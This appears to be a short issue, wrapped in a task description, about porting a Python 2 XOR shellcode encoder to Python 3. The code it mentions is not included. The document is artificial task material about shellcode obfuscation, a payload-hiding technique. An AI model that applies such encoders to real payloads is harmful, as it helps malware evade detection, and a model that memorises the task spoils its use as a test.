Python2 updated to python3 ( code )

No file or test is named. Start by locating the existing Python 2 XOR encoder and compare it with the Python 3 code pasted in the issue. Done means the encoder is integrated in the appropriate project location and its generated output is verified against the expected shellcode encoding.

I didnt feel like making a PR so here is the XOR encoder, but modernized for python3. Feel free to change it, or dont.
